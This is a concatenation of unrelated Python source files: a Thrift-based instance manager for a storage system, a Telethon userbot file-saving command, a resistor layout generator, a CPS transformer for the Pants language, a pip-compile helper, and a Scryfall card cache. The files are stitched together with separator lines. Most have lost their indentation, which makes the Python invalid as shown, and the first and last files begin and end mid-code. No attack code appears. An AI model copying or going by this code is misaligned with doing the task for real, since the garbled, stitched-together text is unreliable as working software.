#only TripS mode supports data placement
if self.policy.check_instance_cnt() == True:
peer_info = {}
peer_info['value'] = self.local_instance_manager.get_connected_instances()
                        peer_info['result'] = True
#create thread for update peer info to all
thread = threading.Thread(target=self._send_peers_info, args=(peer_info,))
thread.daemon = True
thread.start()
#make dummy access dataplacement
result['value'] = json.dumps(self.policy.get_cost_info())
result['value2'] = json.dumps(self.policy.get_goals())
result['result'] = True
print '[TIM-' + self.local_instance_manager.policy.policy_id + ']' + hostname + '(' + ip + ':' + str(instance_port) + ') is registered.'
else:
result['result'] = False
result['value'] = 'Failed to load request to json'
finally:
self.lock.release()
# print 'lock released'
return json.dumps(result)
def requestPolicyChange(self, policy):
start = time.time()
#policy = json.loads(policy)
response = {}
failed_list = self.local_instance_manager.broadcast(policy, 'policyChange')
#there is failed instance
if len(failed_list) > 0:
for hostname in failed_list:
print '[TIM] failed to change policy.' + hostname + ' with a reason: ' + failed_list[hostname]['value']
response['result'] = False
response['value'] = 'Failed to change policy.'
else:
response['result'] = True
elapse = time.time() - start
print str(elapse * 1000) + ' ms takes to change policy'
return json.dumps(response)
class LocalInstanceManager:
def __init__(self, policy):#, expected_instance_cnt):
self.instance_list = {}
self.ip = wieraCommon.get_public_ip()
self.port = 0
self.policy = policy
self.monitoring_info = {}
self.monitoring_lock = threading.Lock()
# set handler to our implementation
# to avoid any sync issue with portnumber
handler = LocalInstanceToWieraHandler(policy, self)
processor = LocalInstanceToWieraIface.Processor(handler)
self.transport = TSocket.TServerSocket(None)
tfactory = TTransport.TFramedTransportFactory()
pfactory = TBinaryProtocol.TBinaryProtocolFactory()
# set server
self.server = TServer.TThreadPoolServer(processor, self.transport, tfactory, pfactory, daemon=True)
self.port = self.transport.port
#set socket thread 20 min
self.server.setNumThreads(64)
#Thrift Server Start
self.instance_manager_thread = threading.Thread(target=self.run_forever, args=())
self.instance_manager_thread.daemon = True
self.instance_manager_thread.start()
def remove_local_instance(self, hostname):
# self.lock.acquire()
if hostname in self.instance_list:
del self.instance_list[hostname]
# self.lock.release()
def get_local_instance_client(self, hostname):
if hostname in self.instance_list:
client = self.instance_list[hostname]['thrift_client']
return client
return None
def get_instance_list(self):
return self.instance_list
def get_connected_instances(self):
#return as a list
instance_list = []
for hostname in self.instance_list:
ip = self.instance_list[hostname]['ip']
application_port = self.instance_list[hostname]['application_port']
peer_port = self.instance_list[hostname]['peer_port']
instance_info = (hostname, ip, application_port, peer_port)
instance_list.append(instance_info)
# print instance_list
return instance_list
def get_manager_server_info(self):
return (self.ip, self.port)
def add_local_instance(self, hostname, ip, application_port, peer_port, instance_port):
self.instance_list[hostname] = {}
self.instance_list[hostname]['ip'] = ip
self.instance_list[hostname]['application_port'] = application_port
self.instance_list[hostname]['peer_port'] = peer_port
self.instance_list[hostname]['instance_port'] = instance_port
# print self.instance_list[hostname]
#thrift needed.
transport = TSocket.TSocket(ip, instance_port)
transport = TTransport.TFramedTransport(transport)
protocol = TBinaryProtocol.TBinaryProtocol(transport)
client = WieraToLocalInstanceIface.Client(protocol)
transport.open()
self.instance_list[hostname]['thrift_client'] = client
self.instance_list[hostname]['socket'] = transport
try:
ret = client.ping()
except TException, e:
wieraCommon.PrintException()
#check need to propagate.
local_server_cnt = len(self.policy.get_available_host_list())
connected_cnt = len(self.instance_list)
if connected_cnt == local_server_cnt:
return self.get_connected_instances()
return None
def run_forever(self):
print '[TIM] Local Instance Manager is ready for Local Instance port: ' + str(self.port)
self.server.serve()
def stop_server(self):
print 'Try to close server and thrift client to instance.'
self.transport.close() #server
for hostname in self.instance_list:
self.instance_list[hostname]['socket'].close()
#will return failed_list
#req is Json type
#req_type is string type
def broadcast(self, req, req_type, instance_list=None, timeout=5):
failed_list = {}
thread_list = {}
if instance_list == None:
instance_list = self.instance_list
for hostname in instance_list:
client = instance_list[hostname]['thrift_client']
if client != None:
if req_type == 'policyChange':
thread = wieraCommon.parallel_exec(client.policyChange, [req,])
# print '[debug] sent dataDistribution message to ' + hostname
thread_list[hostname] = thread
elif req_type == 'dataPlacement':
thread = wieraCommon.parallel_exec(client.dataPlacementChange, [req,])
# print '[debug] sent dataPlacement message to ' + hostname
thread_list[hostname] = thread
else:
                return 'Not supported request'
wieraCommon.join_threads(thread_list.values(), timeout)
for hostname in thread_list:
ret = thread_list[hostname].get_result()
json_ret = json.loads(ret)
if json_ret['result'] == False:
failed_list[hostname] = json_ret
print 'there are failed nodes'
# else:
# print 'Broadcasting to ' + hostname + ' success: ' + json_ret['value']
return failed_list
def update_monitoring_info(self, data):
try:
self.monitoring_lock.acquire()
result = {}
if data != None:
hostname = data['hostname']
json_data = json.loads(data[hostname])
self.monitoring_info[hostname] = json_data
result['result'] = True
result['value'] = 'Latency info has been updated'
# print hostname + ' monitoring data has been updated'
with open('monitoring_info', 'w') as output:
json.dump(self.monitoring_info, output)
else:
result['result'] = False
result['value'] = 'Data is not readable or not JSon format'
except:
            print 'exception happened'
raise
finally:
self.monitoring_lock.release()
return result
#need to be implemented each DC in mind
def get_monitoring_info(self, supported_storage=None):
#there is no monitored _info.
if len(self.monitoring_info) == 0:
#use history latency
with open('./trips_data/monitoring_info') as data_file:
monitoring_info = json.load(data_file)
for hostname in self.instance_list:
if supported_storage == None:
self.monitoring_info[hostname] = monitoring_info[hostname]
else:
self.monitoring_info[hostname] = {}
self.monitoring_info[hostname]['network_latency'] = monitoring_info[hostname]['network_latency']
self.monitoring_info[hostname]['storage_latency'] = {}
for storage in supported_storage:
if storage in monitoring_info[hostname]['storage_latency']:
self.monitoring_info[hostname]['storage_latency'][storage] = monitoring_info[hostname]['storage_latency'][storage]
return self.monitoring_info
|
from telethon import events
import asyncio
from userbot.utils import admin_cmd
@borg.on(admin_cmd(pattern="ttf ?(.*)"))
async def get(event):
name = event.text[5:]
m = await event.get_reply_message()
with open(name, "w") as f:
f.write(m.message)
await event.delete()
await borg.send_file(event.chat_id,name,force_document=True)
|
from .canvas import DefaultCanvas
from ...cell_fabric.generators import *
from ...cell_fabric.grid import *
import logging
logger = logging.getLogger(__name__)
class ResGenerator(DefaultCanvas):
def __init__(self, pdk, fin, finDummy):
super().__init__(pdk)
self.finsPerUnitCell = fin + 2*finDummy
# TODO: Generalize these
self.m1res = self.addGen( Wire( 'm1res', 'M1', 'v',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['Cap']['m1Pitch'], width=self.pdk['Cap']['m1Width']),
spg=EnclosureGrid( pitch=self.pdk['M2']['Pitch'], stoppoint=self.pdk['V1']['VencA_L'] +self.pdk['Cap']['m2Width']//2, check=True)))
self.m1res2 = self.addGen( Wire( 'm1res2', 'M1', 'h',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['M2']['Pitch'], width=self.pdk['Cap']['m1Width']),
spg=EnclosureGrid( pitch=self.pdk['Cap']['m1Pitch'], stoppoint=self.pdk['Cap']['m1Width']//2, check=False)))
self.m2res = self.addGen( Wire( 'm2res', 'M2', 'h',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['M2']['Pitch'], width=self.pdk['Cap']['m2Width']),
spg=EnclosureGrid( pitch=self.pdk['Cap']['m1Pitch'], stoppoint=self.pdk['V1']['VencA_H'] + self.pdk['Cap']['m1Width']//2, check=False)))
self.m2res2 = self.addGen( Wire( 'm2res2', 'M2', 'h',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['Cap']['m2Pitch'], width=self.pdk['Cap']['m2Width']),
spg=EnclosureGrid( pitch=self.pdk['Cap']['m1Pitch'], stoppoint=self.pdk['V1']['VencA_H'] + self.pdk['Cap']['m1Width']//2)))
self.m3res = self.addGen( Wire( 'm3res', 'M3', 'v',
clg=ColoredCenterLineGrid( colors=['c1','c2'], pitch=self.pdk['Cap']['m3Pitch'], width=self.pdk['Cap']['m3Width']),
spg=EnclosureGrid(pitch=self.pdk['M2']['Pitch'], stoppoint=self.pdk['V2']['VencA_H'] + self.pdk['Cap']['m2Width']//2, check=True)))
self.v1res = self.addGen( Via( 'v1res', 'V1', h_clg=self.m2res.clg, v_clg=self.m1res.clg))
self.v2res = self.addGen( Via( 'v2res', 'V2', h_clg=self.m2res.clg, v_clg=self.m3res.clg))
self.Rboundary = self.addGen( Region( 'Rboundary', 'Rboundary', h_grid=self.m2.clg, v_grid=self.m1.clg))
def addResArray(self, x_cells, y_cells, height, unit_res):
for x in range(x_cells):
for y in range(y_cells):
self._addRes(x, y, height, unit_res, (x == x_cells-1) and (y == y_cells-1))
def _addRes( self, x, y, height, unit_res, draw_boundary=True):
y_length = self.finsPerUnitCell * self.pdk['Fin']['Pitch'] * height
assert y_length != 0, (self.finsPerUnitCell, self.pdk['Fin']['Pitch'], height)
res_per_length = 67
x_number = int(round(((1000*unit_res)/(res_per_length*y_length))))
assert x_number >= 1, (unit_res, res_per_length, y_length)
# ga = 2 if x_number == 1 else 1 ## when number of wires is 2 then large spacing req. so contact can be placed without a DRC error
# x_length = (x_number - 1) *ga*self.pdk['Cap']['m1Pitch']
y_number = int(2 *round(((y_length+self.pdk['Cap']['m2Pitch']-self.pdk['Cap']['m2Width'])/(2.0*self.pdk['Cap']['m2Pitch']))))
last_y1_track = ((y_number-1)*self.pdk['Cap']['m2Pitch']+self.pdk['M2']['Pitch']-1)//self.pdk['M2']['Pitch']
last_x_track = x_number - 1
        m2factor = 2 ### number of m2-tracks (m2factor-1) in between two unit cells in y-direction
m1factor = 3
if (y_number-1) % 2 != last_y1_track % 2:
last_y1_track += 1 # so the last color is compatible with the external view of the cell
if last_y1_track % 2 == 1:
m2factor += 1 # so colors match in arrayed blocks
grid_cell_x_pitch = m1factor + last_x_track
grid_cell_y_pitch = m2factor + last_y1_track
grid_y0 = y*grid_cell_y_pitch
grid_y1 = grid_y0 + last_y1_track
for i in range(x_number):
(k, p) = (2*i, 1) if x_number==2 else (i, 0)
grid_x = k + x*grid_cell_x_pitch
self.addWire( self.m1res, None, None, grid_x, (grid_y0, -1), (grid_y1, 1))
if i < x_number-1:
grid_yh = ((i+1)%2)*last_y1_track
self.addWire( self.m1res2, None, None, grid_yh, (i, -1), (i+p+1, 1))
#
# Build the narrow m2 pitch grid starting at grid_cell_y_pitch*y in standard m2 pitch grids (m2.clg)
#
m2n = Wire( self.m2res2.nm, self.m2res2.layer, self.m2res2.direction,
clg=self.m2res2.clg.copyShift( self.m2res.clg.value( grid_cell_y_pitch*y)[0]),
spg=self.m2res2.spg)
#v1n = Via( 'v1', 'via1', h_clg=m2n.clg, v_clg=self.m1res.clg)
#v2n = Via( 'v2', 'via2', h_clg=m2n.clg, v_clg=self.m3res.clg)
grid_x0 = x*grid_cell_x_pitch
grid_x1 = grid_x0 + last_x_track
grid_y = (x_number%2)*last_y1_track
pin = 'PLUS'
self.addWire( m2n, 'PLUS', pin, 0, (0, -1), (0, 1))
self.addVia( self.v1res, None, None, 0, 0)
pin = 'MINUS'
self.addWire( self.m2res, 'MINUS', pin, grid_y, (grid_x1+p, -1), (grid_x1+p, 1))
self.addVia( self.v1res, None, None, grid_x1+p, grid_y)
if draw_boundary:
self.addRegion( self.boundary, 'boundary', None,
-1, -1,
last_x_track + x * grid_cell_x_pitch + 1 + p,
last_y1_track + y * grid_cell_y_pitch + 1)
self.addRegion( self.Rboundary, 'Rboundary', None,
-1, -1,
last_x_track + x * grid_cell_x_pitch + 1 + p,
last_y1_track + y * grid_cell_y_pitch + 1)
|
#!/usr/bin/env python
#
# Copyright (c) 2012, JT Olds <hello@jtolds.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
"""
Pants
http://www.pants-lang.org/
CPS transformation
Single pass delimited continuation transform:
T(v, ec, mc) => (ec v mc)
T(lam, ec, mc) => (ec M(lam) mc)
T(f e, ec, mc) => T(e, {|ve vm| T(f, {|vf vn| (vf ve ec vn)}, vm)}, mc)
T(f e, ec, mc) => T(e, {|ve vm| (f ve ec vm)}, mc)
T(f e, ec, mc) => (f e ec mc)
M({|...| e}) => {|... vc vm| T(e, vc, vm)}
reset = {|lam ec mc| (lam {|x vm| vm x} {|vd| (ec vd mc)})}
shift = {|lam ec mc| (lam {|x vc vm| ec x {|vd| vc vd vm}} {|x vm| vm x} mc)}
"""
__author__ = "JT Olds"
__author_email__ = "hello@jtolds.com"
__all__ = ["transform"]
import types as cps
import ir.types as ir
from common.errors import TransformationError
from common.errors import assert_source
IDENTITY_CONT = cps.Identifier("identity_cont", False, 0, 0)
HALT_CONT = cps.Identifier("halt_cont", False, 0, 0)
RESET = cps.Identifier("reset", True, 0, 0)
SHIFT = cps.Identifier("shift", True, 0, 0)
class Transformer(object):
def __init__(self):
self.varcount = 0
def gensym(self, line, col):
self.varcount += 1
return cps.Identifier("cps_%x" % self.varcount, False, line, col)
def transform_value(self, value):
if not isinstance(value, ir.Function): return value
exp, comp_cont, delim_cont = self.transform(value)
return cps.Callable(exp, value.left_args, value.right_args, comp_cont,
delim_cont, value.line, value.col)
def transform(self, node):
comp_cont = self.gensym(node.line, node.col)
delim_cont = self.gensym(node.line, node.col)
lastval = node.lastval
expressions = node.expressions
if (expressions and isinstance(expressions[-1], ir.ReturnValue)
and isinstance(lastval, ir.Variable)
and expressions[-1].assignee == lastval.identifier):
expressions, ir_exp = expressions[:-1], expressions[-1]
exp = cps.Call(ir_exp.call, ir_exp.left_args, ir_exp.right_args,
cps.Variable(comp_cont, comp_cont.line, comp_cont.col),
cps.Variable(delim_cont, delim_cont.line, delim_cont.col),
ir_exp.line, ir_exp.col)
else:
exp = cps.Call(cps.Variable(comp_cont, comp_cont.line, comp_cont.col),
[], [cps.PositionalOutArgument(lastval, lastval.line, lastval.col)],
None, cps.Variable(delim_cont, delim_cont.line, delim_cont.col),
node.line, node.col)
for ir_exp in reversed(expressions):
exp, comp_cont, delim_cont = self.transform_expression(
ir_exp, exp, comp_cont, delim_cont)
# this provides access to the undelimited function-specific continuation
cont = cps.Identifier("cont", True, exp.line, exp.col)
if exp.references(cont):
arg = self.gensym(exp.line, exp.col)
cont_call = cps.Call(
cps.Variable(comp_cont, comp_cont.line, comp_cont.col), [],
[cps.PositionalOutArgument(
cps.Variable(arg, arg.line, arg.col),
arg.line, arg.col)],
cps.Variable(comp_cont, comp_cont.line, comp_cont.col),
cps.Variable(delim_cont, delim_cont.line, delim_cont.col),
exp.line, exp.col)
cont_callable = cps.Callable(
cont_call, [],
[cps.RequiredInArgument(arg, arg.line, arg.col)],
None, None, exp.line, exp.col)
exp = cps.Assignment(cont, cont_callable, True, exp, exp.line, exp.col)
return exp, comp_cont, delim_cont
def transform_expression(self, ir_exp, next_cps_exp, comp_cont, delim_cont):
if isinstance(ir_exp, ir.Assignment):
return (self.transform_assignment(ir_exp, next_cps_exp),
comp_cont, delim_cont)
if isinstance(ir_exp, ir.ObjectMutation):
return (self.transform_object_mutation(ir_exp, next_cps_exp),
comp_cont, delim_cont)
assert isinstance(ir_exp, ir.ReturnValue)
return self.transform_return_value(ir_exp, next_cps_exp, comp_cont,
delim_cont)
def transform_assignment(self, ir_exp, next_cps_exp):
return cps.Assignment(ir_exp.assignee, self.transform_value(ir_exp.value),
ir_exp.local, next_cps_exp, ir_exp.line, ir_exp.col)
def transform_object_mutation(self, ir_exp, next_cps_exp):
return cps.ObjectMutation(ir_exp.object, ir_exp.field,
self.transform_value(ir_exp.value), next_cps_exp, ir_exp.line,
ir_exp.col)
def transform_return_value(self, ir_exp, next_cps_exp, comp_cont,
delim_cont):
child_comp_cont = cps.Callable(next_cps_exp, [], [cps.RequiredInArgument(
ir_exp.assignee, ir_exp.line, ir_exp.col)], None, delim_cont,
ir_exp.line, ir_exp.col)
child_comp_cont_sym = self.gensym(ir_exp.line, ir_exp.col)
new_delim_cont = self.gensym(ir_exp.line, ir_exp.col)
call = cps.Call(ir_exp.call, ir_exp.left_args, ir_exp.right_args,
cps.Variable(child_comp_cont_sym, ir_exp.line, ir_exp.col),
cps.Variable(new_delim_cont, ir_exp.line, ir_exp.col),
ir_exp.line, ir_exp.col)
return cps.Assignment(child_comp_cont_sym, child_comp_cont, True, call,
ir_exp.line, ir_exp.col), comp_cont, new_delim_cont
def transform(ir_root):
trans = Transformer()
exp, comp_cont, delim_cont = trans.transform(ir_root)
predef = CPSPredefines(exp, trans.gensym)
predef.define_reset()
predef.define_shift()
predef.define_delim_cont(delim_cont)
predef.define_comp_cont(comp_cont)
predef.define_identity_cont()
return predef.result()
class CPSPredefines(object):
def __init__(self, initial_exp, gensym):
self.exp = initial_exp
self.gensym = gensym
def result(self):
return self.exp
def define_identity_cont(self):
val = self.gensym(0, 0)
delim_cont = self.gensym(0, 0)
ident_call = cps.Call(
cps.Variable(delim_cont, delim_cont.line, delim_cont.col),
[],
[cps.PositionalOutArgument(
cps.Variable(val, val.line, val.col), val.line, val.col)],
None, None, val.line, val.col)
ident_cont = cps.Callable(ident_call, [],
[cps.RequiredInArgument(val, val.line, val.col)],
None, delim_cont, val.line, val.col)
self.exp = cps.Assignment(IDENTITY_CONT,
ident_cont, True, self.exp, 0, 0)
def define_comp_cont(self, comp_cont):
self.exp = cps.Assignment(
comp_cont,
cps.Variable(IDENTITY_CONT, IDENTITY_CONT.line, IDENTITY_CONT.col),
True, self.exp, 0, 0)
def define_delim_cont(self, delim_cont):
self.exp = cps.Assignment(
delim_cont,
cps.Variable(HALT_CONT, HALT_CONT.line, HALT_CONT.col),
True, self.exp, 0, 0)
def define_reset(self):
# {|lam ec mc|
# reset_delim_sym = {|vd| (ec vd mc)}
# (lam ident_cont reset_delim_sym)}
if not self.exp.references(RESET):
return
lam = self.gensym(0, 0)
ec = self.gensym(0, 0)
mc = self.gensym(0, 0)
vd = self.gensym(0, 0)
reset_delim_sym = self.gensym(0, 0)
reset_delim_body = cps.Call(
cps.Variable(ec, ec.line, ec.col), [],
[cps.PositionalOutArgument(
cps.Variable(vd, vd.line, vd.col), vd.line, vd.col)],
None, cps.Variable(mc, mc.line, mc.col), 0, 0)
reset_delim_cont = cps.Callable(reset_delim_body, [],
[cps.RequiredInArgument(vd, vd.line, vd.col)], None, None, 0, 0)
reset_body = cps.Call(
cps.Variable(lam, lam.line, lam.col),
[], [],
cps.Variable(IDENTITY_CONT, IDENTITY_CONT.line, IDENTITY_CONT.col),
cps.Variable(reset_delim_sym, reset_delim_sym.line,
reset_delim_sym.col), 0, 0)
reset_body = cps.Assignment(reset_delim_sym, reset_delim_cont, True,
reset_body, 0, 0)
reset_callable = cps.Callable(reset_body, [],
[cps.RequiredInArgument(lam, lam.line, lam.col)], ec, mc, 0, 0)
self.exp = cps.Assignment(RESET, reset_callable, True, self.exp, 0, 0)
def define_shift(self):
# {|lam ec mc|
# user_sym = {|x vc vm|
# reset_delim_sym = {|vd| vc vd vm}
# (ec x reset_delim_sym)}
# (lam user_sym identity_cont mc)}
if not self.exp.references(SHIFT):
return
lam = self.gensym(0, 0)
ec = self.gensym(0, 0)
mc = self.gensym(0, 0)
x = self.gensym(0, 0)
vc = self.gensym(0, 0)
vm = self.gensym(0, 0)
vd = self.gensym(0, 0)
reset_delim_sym = self.gensym(0, 0)
user_sym = self.gensym(0, 0)
reset_delim_body = cps.Call(cps.Variable(vc, vc.line, vc.col), [],
[cps.PositionalOutArgument(
cps.Variable(vd, vd.line, vd.col), vd.line, vd.col)], None,
cps.Variable(vm, vm.line, vm.col), 0, 0)
reset_delim_cont = cps.Callable(reset_delim_body, [],
[cps.RequiredInArgument(vd, vd.line, vd.col)], None, None, 0, 0)
user_body = cps.Call(cps.Variable(ec, ec.line, ec.col), [],
[cps.PositionalOutArgument(
cps.Variable(x, x.line, x.col), x.line, x.col)], None,
cps.Variable(
reset_delim_sym, reset_delim_sym.line, reset_delim_sym.col), 0, 0)
user_body = cps.Assignment(reset_delim_sym, reset_delim_cont, True,
user_body, 0, 0)
user_cont = cps.Callable(user_body, [],
[cps.RequiredInArgument(x, x.line, x.col)], vc, vm, 0, 0)
shift_body = cps.Call(cps.Variable(lam, lam.line, lam.col), [],
[cps.PositionalOutArgument(
cps.Variable(user_sym, user_sym.line, user_sym.col),
user_sym.line, user_sym.col)],
cps.Variable(IDENTITY_CONT, IDENTITY_CONT.line, IDENTITY_CONT.col),
cps.Variable(mc, mc.line, mc.col), 0, 0)
shift_body = cps.Assignment(user_sym, user_cont, True, shift_body, 0, 0)
shift_callable = cps.Callable(shift_body, [],
[cps.RequiredInArgument(lam, lam.line, lam.col)], ec, mc, 0, 0)
self.exp = cps.Assignment(SHIFT, shift_callable, True, self.exp, 0, 0)
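# ---------------------------------------------------------------------------
# Illustration only (not used by the transformer above): a hedged Python
# sketch of the two-continuation protocol from the module docstring. Every
# CPS'd callable receives its arguments plus `ec`, the computation
# continuation taking (value, delim_cont), and a delimited continuation
# taking a single value. `_reset`/`_shift` transcribe the docstring's
# `reset`/`shift` lambdas directly.
def _reset(lam, ec, mc):
    # reset = {|lam ec mc| (lam {|x vm| vm x} {|vd| (ec vd mc)})}
    return lam(lambda x, vm: vm(x), lambda vd: ec(vd, mc))

def _shift(lam, ec, mc):
    # shift = {|lam ec mc| (lam {|x vc vm| ec x {|vd| vc vd vm}} {|x vm| vm x} mc)}
    user = lambda x, vc, vm: ec(x, lambda vd: vc(vd, vm))
    return lam(user, lambda x, vm: vm(x), mc)

# reset {| 1 + shift {|k| k (k 10)} |} evaluates to 12: the captured
# continuation k is the "1 + [.]" frame, applied twice to 10.
_body = lambda ec, mc: _shift(
    lambda k, ec2, mc2: k(10, lambda v1, vm1: k(v1, ec2, vm1), mc2),
    lambda v, vm: ec(v + 1, vm),  # the "1 + [.]" frame, CPS'd
    mc)
assert _reset(_body, lambda v, mc: mc(v), lambda v: v) == 12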
|
#!/usr/bin/env python3
import os
import subprocess
import sys
def main():
result = subprocess.run(['pip', 'show', 'pip-tools'], stdout=subprocess.PIPE)
    if not result.stdout.strip():
        # Note: fg/bg color kwargs belong to click.secho(), not the builtin print().
        print('This script requires the pip-tools package be installed:\n'
              '    pip install pip-tools')
        sys.exit(1)
req_args = ['pip-compile', '--output-file', 'requirements.txt',
'requirements.in', '--upgrade']
print('Running ' + ' '.join(req_args))
subprocess.run(req_args, stdout=subprocess.PIPE)
dev_req_args = ['pip-compile', '--output-file', 'requirements-dev.txt',
'requirements-dev.in', '--upgrade']
print('Running ' + ' '.join(dev_req_args))
subprocess.run(dev_req_args, stdout=subprocess.PIPE)
with open(os.path.join(os.getcwd(), 'requirements.txt')) as f:
requirements = f.read()
dev_requirements_path = os.path.join(os.getcwd(), 'requirements-dev.txt')
with open(dev_requirements_path) as f:
dev_requirements = f.read()
reqs = set([line[:line.find('==')]
for line in requirements.splitlines()
if line and not line.startswith('#')])
dev_reqs = [line for line in dev_requirements.splitlines()
if line and not line.startswith('#')
and line[:line.find('==')] not in reqs]
new_dev_reqs = [line for line in dev_requirements.splitlines()
if line.startswith('#')] + ['-r requirements.txt', ''] + dev_reqs
with open(dev_requirements_path, 'w') as f:
f.write('\n'.join(new_dev_reqs) + '\n')
print('Successfully updated requirements.txt and requirements-dev.txt')
if __name__ == '__main__':
main()
|
# -*- coding: utf-8 -*-
"""Classes for main Scryfall cache objects."""
import logging
import os
import shutil
import time
try:
from urllib.parse import urlencode
except ImportError:
from urllib import urlencode
import appdirs
from pony import orm
import requests
from requests_ratelimit_adapter import HTTPRateLimitAdapter
log = logging.getLogger(__name__)
# Module information
__version__ = "0.2.2"
__author__ = """Max Dymond"""
__email__ = "cmeister2@gmail.com"
package = "scryfall_cache"
# Define a rate limiter adapter for Scryfall. The upper limit is 10 requests
# per second or 1 every 100ms.
ScryfallRateLimiter = HTTPRateLimitAdapter(calls=1, period=0.1)
# Define time periods in seconds
ONE_DAY = 24 * 60 * 60
TWELVE_WEEKS = 12 * 7 * ONE_DAY
class ScryfallCacheException(Exception):
"""Exception raised by ScryfallCache."""
pass
class ScryfallCache(object):
"""Main cache object."""
BULK_DATA_LIST = "default_cards"
DATABASE_FILENAME = "scryfallcache.sqlite3"
def __init__(
self,
application=None,
version=None,
bulk_update_period=TWELVE_WEEKS,
sql_debug=False,
):
"""Construct a ScryfallCache object.
Args:
application (str): Name of application to use for cached data.
version (str): Version string of application. If None, no version is used.
bulk_update_period (int): The period after which the cache is bulk-updated.
sql_debug (bool): Whether SQL debug commands are shown.
"""
self.bulk_update_period = bulk_update_period
# Create a requests Session and mount the rate limiter to protect
# Scryfall.
self.session = requests.Session()
self.session.mount("http://", ScryfallRateLimiter)
self.session.mount("https://", ScryfallRateLimiter)
# Create an Appdirs instance to find where the local cache should
# be stored.
self.app = appdirs.AppDirs(package, application, version=version)
# If the cache folders do not exist, make them.
if not os.path.isdir(self.app.user_data_dir):
os.makedirs(self.app.user_data_dir)
# Get the local database.
self.database_path = os.path.join(
self.app.user_data_dir, self.DATABASE_FILENAME
)
log.debug("Scryfall database path: %s", self.database_path)
# Create local instances of database objects
self.db = open_database(self.database_path, create_db=True, sql_debug=sql_debug)
# Check the database for an update.
self._check_database()
def get_cache_directory(self):
"""
Get the top level cache directory that this instance is using.
Useful for other libraries if they want to store data in
ScryfallCache's cache folder.
Returns:
str: the cache directory path.
"""
return self.app.user_data_dir
def get_card(self, name=None, scryfall_id=None, mtgo_id=None):
"""
Attempt to get a ScryfallCard object for any given identifiers.
Args:
name (str): The name of the card if known.
scryfall_id (str): The Scryfall ID of the card if known.
mtgo_id (int): The MTGO ID of the card if known.
Raises:
ScryfallCacheException: if no identifiers are given.
Returns:
ScryfallCard if ID found, else None.
"""
if name is not None:
card_dict = self._card_from_name(name)
elif scryfall_id is not None:
card_dict = self._card_from_id(scryfall_id)
elif mtgo_id is not None:
card_dict = self._card_from_mtgo_id(mtgo_id)
else:
raise ScryfallCacheException("Require at least one identifier to query on")
# Check the card dictionary.
if not card_dict:
return None
# Found a card dictionary containing all the necessary information.
# Pass a ScryfallCard back to the user.
return ScryfallCard(self, card_dict)
def _card_from_id(self, scryfall_id):
"""Request a card data dictionary by Scryfall ID.
Args:
scryfall_id(str): The Scryfall ID of the card.
Returns:
Dictionary of card data if card is found, else None.
"""
with orm.db_session:
# This is safe because id is a primary key, so there should be 0
# or 1 entries.
result = self.db.Card.get(id=scryfall_id)
if result:
card_json = result.data
else:
log.debug("Card not found in database: %s", scryfall_id)
# Query the API for what Scryfall thinks is correct.
card_json = self._query_scryfall(
"https://api.scryfall.com/cards/{scryfall_id}".format(
scryfall_id=scryfall_id
),
timeout=ONE_DAY,
)
if card_json:
# Save this card for future as it wasn't found first time.
self._save_card(card_json)
return card_json
def _card_from_name(self, name):
"""Request a card dictionary by name.
Args:
name (str): The name of the card.
Returns:
Dictionary of card data if card is found, else None.
"""
with orm.db_session:
results = orm.select(c for c in self.db.Card if c.name == name)
if not results:
results = []
cards_json = [m.data for m in results]
if len(cards_json) == 1:
log.debug("Returning single result for name %s", name)
card_json = cards_json[0]
else:
log.debug("Got %d results for name %s", len(cards_json), name)
# Encode the URL parameters.
params = urlencode({"exact": name})
# Query the API for what Scryfall thinks is correct.
card_json = self._query_scryfall(
"https://api.scryfall.com/cards/named?{params}".format(params=params),
timeout=ONE_DAY,
)
if card_json and len(cards_json) == 0:
# Save this card for future as no cards were found first time.
self._save_card(card_json)
return card_json
def _card_from_mtgo_id(self, mtgo_id):
"""Request a card dictionary by MTGO ID.
Args:
mtgo_id(int): The MTGO ID of the card.
Returns:
Dictionary of card data if card is found, else None.
"""
with orm.db_session:
# Search for the normal or foil version of the card.
results = orm.select(
c for c in self.db.Card
if c.mtgo_id == mtgo_id or c.mtgo_foil_id == mtgo_id
)
if not results:
results = []
cards_json = [m.data for m in results]
if len(cards_json) == 1:
log.debug("Returning single result for MTGO ID %d", mtgo_id)
card_json = cards_json[0]
else:
log.debug(
"Expected 1 result for MTGO ID %d, got %d results instead",
mtgo_id,
len(cards_json),
)
# Query the API for what Scryfall thinks is correct.
card_json = self._query_scryfall(
"https://api.scryfall.com/cards/mtgo/{mtgo_id}".format(mtgo_id=mtgo_id),
timeout=ONE_DAY,
)
if card_json and len(cards_json) == 0:
# Save this card for future as no cards were found first time.
self._save_card(card_json)
return card_json
def _save_card(self, card_data):
# Insert this into the database.
with orm.db_session:
log.debug("Saving card information to database for %s", card_data["id"])
self.db.Card(
id=card_data["id"],
name=card_data["name"],
mtgo_id=card_data.get("mtgo_id", None),
mtgo_foil_id=card_data.get("mtgo_foil_id", None),
data=card_data,
)
def _check_database(self):
with orm.db_session:
metadata = orm.select(m for m in self.db.Metadata).first()
if not metadata:
# Create a new metadata object. Record the version of ScryfallCache
# that we're using here, so we can migrate later.
metadata = self.db.Metadata(lastupdate=0, version=__version__)
if metadata.lastupdate + self.bulk_update_period < time.time():
log.debug(
"Updating database due to aging out (%d)", self.bulk_update_period
)
self._bulk_update_database()
def _bulk_clear_database(self):
